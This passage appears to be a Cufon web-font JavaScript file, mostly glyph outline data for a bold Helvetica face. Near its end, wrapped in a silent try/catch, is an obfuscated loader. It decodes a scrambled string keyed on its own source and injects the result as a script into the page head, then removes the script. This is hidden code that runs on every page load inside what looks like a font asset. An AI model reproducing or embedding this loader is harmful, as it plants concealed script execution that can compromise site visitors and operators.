","w":100},{"d":"63,0r-59,-270r63,0r33,189r33,-189r63,0r-59,270r-74,0","w":200,"k":{"u":6,"r":6,"o":6,"e":6,"a":6,"A":13,";":6,":":6,".":33,"-":6,",":33}},{"d":"119,-320v0,-9,-9,-19,-19,-18v-9,-1,-19,9,-18,18v-1,10,9,19,18,19v9,0,19,-9,19,-19xm100,-221r-19,121r37,0xm141,-320v0,25,-16,41,-41,41v-24,0,-40,-16,-40,-41v0,-24,16,-40,40,-40v25,0,41,16,41,40xm3,0r59,-270r77,0r58,270r-64,0r-9,-53r-49,0r-8,53r-64,0","w":200},{"d":"111,-162v0,-28,7,-63,-21,-63v-25,0,-20,35,-20,62v0,15,4,28,21,28v17,1,20,-12,20,-27xm171,-175v2,98,8,206,-109,178v-32,-7,-48,-28,-48,-66r57,0v1,14,4,25,20,24v27,-1,18,-37,20,-64v-11,9,-22,13,-42,13v-46,0,-59,-35,-59,-81v0,-63,20,-99,83,-99v58,0,78,39,78,95"},{"d":"215,-58v-1,-17,2,-38,-1,-53r-28,53r29,0xm58,0r147,-270r30,0r-146,270r-31,0xm51,-270v52,-7,68,62,27,78v47,15,29,94,-27,88v-34,-3,-54,-19,-51,-56r37,0v2,13,0,30,15,29v22,-2,20,-50,-6,-46r-13,0r0,-26v18,1,31,-5,31,-23v0,-10,-3,-17,-14,-17v-11,1,-13,11,-12,24r-38,0v-3,-36,21,-47,51,-51xm157,-61r54,-97r41,0r0,100r15,0r0,27r-15,0r0,31r-37,0r0,-31r-58,0r0,-30","w":270},{"d":"67,-233v-5,-17,-29,-10,-28,7r0,15r-37,0v-2,-39,15,-59,53,-59v55,0,65,64,29,91v-15,11,-30,24,-38,42r61,0r0,29r-106,0v-1,-55,43,-70,64,-104v3,-5,2,-13,2,-21","w":108},{"d":"70,-102v0,27,-7,63,20,63v26,0,20,-35,21,-62v0,-16,-6,-28,-22,-28v-15,0,-19,13,-19,27xm10,-89v-2,-99,-9,-206,109,-178v30,8,47,29,48,67r-58,0v-1,-14,-3,-26,-19,-25v-27,1,-19,37,-20,64v12,-8,22,-13,41,-13v46,0,60,36,60,81v0,61,-20,99,-83,99v-59,0,-77,-39,-78,-95"},{"d":"20,-138r0,-62r61,0r0,62r-61,0xm20,36v21,-1,31,-16,33,-36r-33,0r0,-62r61,0v2,59,4,120,-61,118r0,-20","w":100},{"d":"21,-178v20,0,30,-14,30,-34r-30,0r0,-58r57,0v2,58,5,114,-57,113r0,-21","w":100,"k":{"s":20,"\u2019":6}},{"d":"112,-72v26,-35,-25,-53,-44,-71v-29,32,25,53,44,71xm161,-4v8,79,-120,94,-142,29v-3,-9,-4,-18,-4,-28r52,0v0,14,4,28,19,28v31,2,24,-36,5,-46v-33,-27,-81,-42,-81,-100v0,-22,13,-44,28,-53v-43,-45,8,-123,81,-99v26,9,41,27,42,60r-52,0v1,-15,-4,-22,-18,-22v-20,-1,-21,22,-10,33v31,32,90,45,90,103v0,27,-13,44,-30,53v11,9,18,23,20,42"},{"d":"87,-36v27,-1,20,-35,21,-62v-18,11,-41,13,-42,41v0,12,8,21,21,21xm161,-271v-5,25,-16,47,-45,48v-27,1,-57,-32,-68,2r-28,0v5,-26,15,-49,44,-51v26,-2,56,30,68,1r29,0xm166,-146v1,48,-5,106,4,146r-56,0r-3,-18v-25,39,-102,29,-102,-30v0,-66,57,-63,95,-87v9,-11,3,-36,-14,-34v-19,-1,-21,14,-22,31r-57,0v-2,-48,28,-69,78,-69v49,0,76,15,77,61"},{"d":"87,-225v-22,2,-22,28,-21,53r-57,0v-4,-62,24,-94,82,-98v88,-7,98,106,45,152v-23,20,-48,38,-59,69r93,0r0,49r-162,0v-1,-88,65,-118,98,-174v6,-19,5,-53,-19,-51"},{"d":"61,-202r20,131r20,-131r56,0r-44,202r-66,0r-44,-202r58,0","w":159,"k":{".":20,",":20}},{"d":"71,-151v-2,47,4,102,5,151r-61,0r0,-270r66,0r50,151r-6,-151r60,0r0,270r-65,0","w":200},{"d":"9,-111r162,0r0,42r-162,0r0,-42"},{"d":"80,-49v68,10,36,-83,42,-138v3,-29,-13,-35,-42,-34r0,46r27,0r0,33r-27,0r0,93xm185,-76v6,88,-84,77,-168,76r0,-142r-16,0r0,-33r16,0r0,-95v86,-1,168,-10,168,79r0,115","w":200},{"d":"71,-343r59,0r44,54r-54,0r-20,-27r-20,27r-53,0xm101,-42v20,0,21,-20,22,-39r-1,-123v0,-15,-8,-24,-22,-24v-18,0,-22,16,-22,36r0,124v2,13,8,26,23,26xm101,-276v54,0,85,28,85,80v-2,96,21,202,-85,202v-106,0,-86,-105,-87,-202v0,-52,32,-80,87,-80","w":200},{"d":"90,64v22,3,24,-26,4,-26v-5,0,-10,1,-15,4r-9,-9r16,-27v-91,1,-72,-108,-72,-196v0,-59,26,-86,85,-86v63,0,92,32,86,100r-63,0v1,-24,0,-51,-20,-52v-20,-1,-24,9,-25,28r0,134v0,16,6,24,23,24v27,-1,23,-34,23,-63r63,0v6,68,-17,108,-79,111v-3,6,-11,12,-10,17v23,-5,47,2,47,26v0,42,-62,39,-93,24r8,-16v10,2,18,8,31,7","w":200},{"d":"90,-140r-60,0r0,-62r60,0r0,62xm76,-115v8,59,19,113,16,183r-64,0v-3,-69,8,-125,16,-183r32,0","w":119},{"d":"9,-202r126,0r0,42r-66,115r66,0r0,45r-130,0r0,-40r66,-117r-62,0r0,-45","w":140},{"d":"126,-153v0,-30,-14,-36,-44,-34r0,67v30,3,44,-3,44,-33xm189,-153v0,66,-40,85,-107,82r0,71r-63,0r0,-270r63,0r0,34v68,-2,107,15,107,83","w":200},{"d":"54,-84v-72,-18,-60,-132,26,-123v43,5,73,20,73,65r-54,0v-1,-15,-3,-28,-19,-28v-28,-1,-21,33,-2,38v35,16,75,24,78,74v5,75,-124,85,-147,28v-3,-9,-5,-20,-5,-32r55,0v-9,33,41,43,41,12v0,-23,-30,-24,-46,-34","w":159},{"d":"90,-40v31,-7,14,-63,17,-98v0,-13,-4,-22,-16,-23v-31,6,-16,62,-18,97v2,11,5,23,17,24xm115,6v-19,0,-32,-12,-43,-25r0,87r-57,0r0,-270r53,0v1,8,-2,19,1,25v10,-17,24,-30,47,-30v61,0,48,78,49,139v0,40,-11,73,-50,74"},{"d":"22,-221r0,-49r57,0r0,49r-57,0xm22,0r0,-202r57,0r0,202r-57,0","w":100},{"d":"67,-178v13,-32,74,-40,86,-3v16,-39,95,-33,94,16r0,165r-58,0r0,-144v0,-11,-4,-17,-15,-17v-10,0,-15,6,-15,17r0,144r-57,0r0,-144v-2,-8,-4,-17,-14,-17v-11,1,-17,5,-17,17r0,144r-57,0r0,-202r53,0r0,24","w":259},{"d":"92,-40v33,-7,13,-61,18,-98v-1,-12,-4,-24,-17,-22v-32,4,-13,60,-18,96v2,11,5,23,17,24xm117,6v-21,0,-37,-13,-46,-29r0,23r-54,0r0,-270r58,0r0,85v8,-16,23,-22,43,-22v61,1,48,78,49,139v0,40,-11,74,-50,74"},{"d":"130,-104r-121,0r0,-42r162,0r0,105r-41,0r0,-63"},{"d":"164,-282r-62,54r-49,0r36,-54r75,0xm90,-166v-13,0,-18,11,-18,23r0,90v0,12,6,18,18,18v12,0,18,-6,18,-18r0,-90v0,-12,-5,-23,-18,-23xm90,6v-44,0,-74,-17,-75,-62r0,-82v0,-48,27,-69,75,-69v49,0,75,21,75,69r0,82v-2,45,-30,62,-75,62"},{"d":"101,-42v36,0,19,-70,21,-105r-44,79v3,13,7,26,23,26xm100,-228v-40,7,-16,80,-22,122v13,-34,43,-55,44,-98v0,-15,-8,-23,-22,-24xm14,-196v-6,-75,89,-99,143,-65r19,-34r32,17r-28,47v12,38,5,97,6,145v2,60,-23,94,-85,92v-21,0,-38,-3,-51,-10r-19,35r-29,-18r24,-41v-21,-37,-7,-112,-12,-168","w":200},{"d":"124,0r0,-270r57,0r0,270r-57,0xm30,-202v-7,-58,24,-73,82,-68r0,41v-10,0,-23,-2,-25,7r0,20r25,0r0,42r-25,0r0,160r-57,0r0,-160r-23,0r0,-42r23,0","w":200},{"d":"50,-277r0,47r-57,0r0,-47r57,0xm71,-277r56,0r0,47r-56,0r0,-47","w":119},{"d":"62,-14r-52,0r0,-48r52,0r0,-80r-52,0r0,-49r52,0r0,-79r57,0r0,79r51,0r0,49r-51,0r0,80r52,0r0,48r-52,0r0,76r-57,0r0,-76"},{"d":"4,-206v0,-90,114,-58,195,-64r0,41r-13,0r0,271r-49,0r0,-271r-24,0r0,271r-48,0r0,-186v-36,0,-61,-25,-61,-62","w":198},{"d":"152,-174v-42,0,-59,78,-16,85v27,4,43,-19,45,-44v2,-23,-4,-41,-29,-41xm71,-122v0,-67,79,-115,122,-64r4,-19r36,0r-20,111v1,13,11,7,19,0v14,-13,26,-33,26,-58v0,-64,-39,-98,-103,-98v-72,0,-109,44,-114,114v-7,104,130,148,194,83r35,0v-24,32,-61,59,-112,59v-88,0,-145,-56,-145,-142v0,-86,56,-140,143,-140v75,0,130,43,130,113v0,63,-37,101,-94,109v-13,2,-15,-13,-16,-24v-39,45,-105,16,-105,-44","w":298},{"d":"53,-270v51,-6,67,62,26,78v47,16,30,88,-26,88v-34,0,-55,-19,-52,-56r38,0v0,15,0,30,14,29v22,-2,20,-50,-6,-46r-13,0r0,-26v18,0,33,-4,31,-23v0,-10,-3,-17,-14,-17v-11,1,-13,11,-12,24r-38,0v-3,-36,21,-47,52,-51","w":108},{"d":"30,0r0,-62r60,0r0,62r-60,0","w":119},{"d":"13,-224v37,1,65,-10,72,-40r41,0r0,264r-58,0r0,-182r-55,0r0,-42"},{"d":"20,24v33,10,27,-19,22,-43r-40,-183r58,0r20,131r20,-131r56,0r-46,211v-7,43,-37,67,-90,57r0,-42","w":159,"k":{".":20,",":20}},{"d":"91,-170v-20,-1,-21,21,-20,41r40,0v1,-22,-1,-40,-20,-41xm91,-282r36,54r-49,0r-61,-54r74,0xm91,-207v44,0,77,15,77,58r0,58r-97,0v1,24,-6,56,18,56v19,0,19,-18,20,-35r57,0v2,52,-24,76,-75,76v-45,0,-77,-16,-77,-62r0,-82v-1,-50,28,-69,77,-69"},{"d":"71,-270r0,360r-52,0r0,-360r52,0","w":90},{"d":"54,0r0,-62r60,0r1,62r-61,0xm86,-228v-18,1,-22,17,-21,37r-57,0v-2,-53,28,-80,79,-85v77,-7,104,75,59,124v-16,17,-34,33,-34,66r-54,0v-9,-60,49,-70,49,-118v0,-12,-7,-25,-21,-24"},{"d":"100,-221r-19,121r37,0xm3,0r59,-270r77,0r58,270r-64,0r-9,-53r-49,0r-8,53r-64,0","w":200,"k":{"y":6,"w":6,"v":6,"Y":20,"W":13,"V":13,"T":20,"\u2019":20}},{"d":"90,-161v-12,-1,-16,11,-16,22r0,139r-57,0r0,-270r57,0r1,84v21,-35,89,-25,89,24r0,162r-57,0r0,-143v0,-13,-4,-18,-17,-18"},{"d":"112,-229v-10,0,-23,-2,-25,7r0,21r25,0r0,41r-25,0r0,160r-57,0r0,-160r-23,0r0,-41r23,0v-6,-58,23,-74,82,-69r0,41","w":119,"k":{"\u2019":-6}},{"d":"61,-346r57,0r0,47r-57,0r0,-47xm40,-346r0,47r-57,0r0,-47r57,0xm18,0r0,-270r64,0r0,270r-64,0","w":100},{"d":"80,-277r0,47r-57,0r0,-47r57,0xm101,-277r57,0r0,47r-57,0r0,-47xm90,-166v-13,0,-18,11,-18,23r0,90v0,12,6,18,18,18v12,0,18,-6,18,-18r0,-90v0,-12,-5,-23,-18,-23xm90,6v-44,0,-74,-17,-75,-62r0,-82v0,-48,27,-69,75,-69v49,0,75,21,75,69r0,82v-2,45,-30,62,-75,62"},{"d":"9,-270r144,0r0,50r-79,166r82,0r0,54r-152,0r0,-48r80,-168r-75,0r0,-54","w":159},{"d":"30,-59r0,-62r60,0r0,62r-60,0","w":119},{"d":"5,-134r64,-136r42,0r64,136r-37,17r-48,-101r-48,101"},{"d":"51,-350r36,53r-49,0r-61,-53r74,0xm18,0r0,-270r64,0r0,270r-64,0","w":100},{"d":"71,-177v4,-66,34,-113,105,-93r-10,46v-29,-14,-37,19,-38,47r37,0r0,40r-43,0v-18,65,-13,152,-53,195v-13,14,-49,15,-68,4r8,-47v27,19,31,-16,36,-43r18,-109r-37,0r0,-40r45,0"},{"d":"16,-91r37,-21r-37,-23r0,-47r65,43r0,53r-65,42r0,-47","w":100},{"d":"93,-96r0,-88r-44,88r44,0xm3,-102r84,-162r63,0r0,168r24,0r0,45r-24,0r0,51r-57,0r0,-51r-90,0r0,-51"},{"d":"100,-221r-19,121r37,0xm67,-343r59,0r44,54r-53,0r-20,-27r-20,27r-53,0xm3,0r59,-270r77,0r58,270r-64,0r-9,-53r-49,0r-8,53r-64,0","w":200},{"d":"72,-200v8,0,16,-8,16,-16v0,-8,-8,-16,-16,-16v-8,0,-16,8,-16,16v0,8,8,16,16,16xm72,-270v32,0,54,22,54,54v0,32,-22,54,-54,54v-32,0,-54,-22,-54,-54v0,-32,22,-54,54,-54","w":144},{"d":"122,-238r-43,0r0,113r-37,0r0,-113r-41,0r0,-32r121,0r0,32xm309,-125r-34,0r0,-113r-41,113r-22,0r-41,-113r0,113r-33,0r0,-145r52,0r34,90r32,-90r53,0r0,145","w":309},{"d":"100,-42v15,-22,20,-95,-13,-95v-13,0,-20,7,-21,20r-53,0r6,-147r140,0r0,48r-94,0r-2,51v10,-10,23,-17,42,-17v52,0,65,41,65,93v0,61,-21,97,-83,95v-54,-1,-77,-29,-76,-86r57,0v-4,25,10,51,32,38"},{"d":"96,-169v-42,-4,-22,86,-21,129xm17,-52v-3,-84,-8,-163,77,-155r9,-40r31,0r-9,45v31,10,41,33,39,75r-51,0v1,-15,0,-26,-5,-37r-21,132v29,7,26,-24,28,-50r51,0v3,61,-20,93,-85,88r-9,47r-31,0r10,-53v-20,-10,-32,-25,-34,-52"},{"d":"85,67r-79,0r0,-34r29,0r0,-269r-29,0r0,-34r79,0r0,337","w":100},{"d":"134,-282r-62,54r-49,0r36,-54r75,0","w":119},{"d":"105,-144v0,-11,-4,-17,-15,-17v-10,0,-15,6,-15,17r0,144r-57,0r0,-202r53,0v1,8,-2,20,1,26v7,-16,17,-31,40,-31v30,0,51,14,51,42r0,165r-58,0r0,-144"},{"d":"15,-270r79,0r0,34r-29,0r0,269r29,0r0,34r-79,0r0,-337","w":100},{"d":"15,0r0,-270r63,0r0,104r44,0r0,-104r63,0r0,270r-63,0r0,-112r-44,0r0,112r-63,0","w":200},{"d":"123,-189v0,-28,-16,-35,-45,-32r0,66v29,3,45,-6,45,-34xm126,0v-16,-41,21,-118,-48,-107r0,107r-63,0r0,-270v82,1,170,-17,170,75v0,34,-11,49,-33,62v51,7,22,91,43,133r-69,0","w":200,"k":{"Y":6,"T":6}},{"d":"88,-40v10,0,16,-7,16,-17r0,-145r58,0r0,202r-54,0r0,-25v-7,15,-18,31,-40,31v-32,1,-51,-12,-51,-42r0,-166r57,0r1,151v1,6,4,12,13,11"},{"d":"23,-221r0,-49r57,0r0,49r-57,0xm80,5v3,49,-22,69,-75,63r0,-41v15,3,18,-8,18,-19r0,-210r57,0r0,207","w":100},{"d":"16,0r0,-270r63,0r1,108r47,-108r65,0r-58,119r61,151r-67,0r-35,-94r-14,27r0,67r-63,0","w":200},{"d":"89,-277r0,47r-58,0r0,-47r58,0","w":119},{"d":"18,-178v20,0,30,-14,30,-34r-30,0r0,-58r57,0v2,58,4,113,-57,113r0,-21xm104,-178v20,0,30,-14,30,-34r-30,0r0,-58r57,0v2,58,5,114,-57,113r0,-21"},{"d":"14,0r0,-270r58,0r0,136r40,-68r62,0r-57,81r58,121r-60,0r-34,-78v-15,14,-7,51,-9,78r-58,0"},{"d":"18,34v20,0,32,-13,31,-34r-31,0r0,-58r57,0v2,58,5,114,-57,113r0,-21xm105,34v20,0,30,-14,30,-34r-30,0r0,-58r57,0v2,58,5,114,-57,113r0,-21"},{"d":"17,-274r59,0r44,53r-53,0r-20,-27r-20,27r-53,0xm22,0r0,-202r57,0r0,202r-57,0","w":100}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-1022-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("dM|6mCWTrP]ldNBcnN%w{MD.pd,gW9f=YyeViP^5|rmLszuh#3o(BCJKEIFv$lx:+&7T6t-!>G@4]}?@sC{&.M.]^tW6|C]l^tp&rPYJ|i4v57T3^DV:gM=t^DV:gC=!^DV:gM=>^DV&g%w!=6+6g%no5B+6g%n#5i+6g%nBW6+6g%poWTYLsec:|e{B^DV:gMw6^DV:gMY#z{+6gon#5T|Lsec:5t{u^DV&g%{o^DV:gMY(p6+6g%nBWM]Lsec:5CpLsec:|%{Lsec:|%sLsec&|MWLsec:|%pLsec:57wo^DV:gM{B^DV:gMi3.^6v^DV&g%.t^DV:gMgtpB+6g%n356+6g%w6gB#Lsec:|PWLse.:go.7^DV:gMp#^DV:gM5+^DV:gMYo^DV:gMYCgD>Lsec+W%{Lsec75CWLsec:|e|Lsec:|opL^{+6g%wtg{+6g%nC|i+6go.+9i+6g%po9i+6g%nC5B+6g%n#9i+6g%n#g&nLse.:gonLsec&|MpLsec:5e|Lsec:|oiLsec+g7{Lsec+W%pLsec+W7#Lsec:5oBLsec:|o=-^DV:gesB^DV:gM|C^DV&g%g:fi+6g%nB9i+6go.+Wi+6g%n3|B+6g%poWB+6g%n3Wi+6g%nBWVBLsec:5CYLsec+Wt=E^DV:gMiC^NpLsec+Wo{J^DV:gM.!d6+6g%nC|{+6|C.:gPnLsec:|osLsec:5P|TV6+6g%nBgB+6g%p(|{+6g%no|^sLsec:|Mp{^N]Lsec:|o#Lsec&|M{Lsec:5PYLsec:|oBLsec:5o{Lsec+WeWLsec:57BLsec:57YLsec:5tYi^DV:gM|o^DV:gMV:^DV&g%{#9D$Lse.:W%YLsec:5eY+^DV&g%w7Y7:Ii&iLsec:|%i(=(+Lsec:|CwvV{+6g%n(g6+6g%nB5i+6g%nogT6fiMWLsec:57n#^DV:gMg!^DV&g%wT^DV:gMi(Lo>Lsec:|onLsec:5P.K^DV:gMw:Vy=$PVELse.:g7(GiB+6g%noWeBLsec:5CiLsec:5o.t96+6goc+9i+6g%n#W6+6g%nBg7pteB+6go.+gB+6g%n(g{+6g%n(W{+6g%noW6+6g%n#g^ELsec:|Mi7LMB$5B+6g%n#56+6g%nCg6+6g%n(9{+6|C.:gB+6g%n#9{+6goc&gi+6g%n3W(nLsec:5oglg^BLsec:|e#4fT{K|B+6g%no|B+6g%nCWBELsec:5osz^DV:gMWo^DV:ge(&^DV&g%W#W{+6g%nogB+6g%n3g{+6gow&goiLsec:5eps^DV:gM.TmB$.VJiIy6+6g%p(9i+6goc+|M$Lse.:gPiLsec:|PV3,JW:mMBTdN.3dy+EfecvL%63,Jcvm%6:,C+BmCsTrN+JfP.l|3>JmDB:rDg]z-T@rP5K53>xr7Tx^3h?9Js-s6:lde4Kf7EC5P$BLB:l5t]$^N>#sy((,t(lsMi7sN#vmtW#sMBxm3>Km-WTmC{$|y(E|C]&d%$EfM:@d&$EdPsm56$E^iT]L{$E^^TEdN(h")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":180,"face":{"font-family":"Helvetica","font-weight":900,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 10 6 5 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"6","bbox":"-60 -360 401.046 90","underline-thickness":"18","underline-position":"-27","unicode-range":"U+0020-U+FB02"}}));

Cufon.replace('h1, .intro');
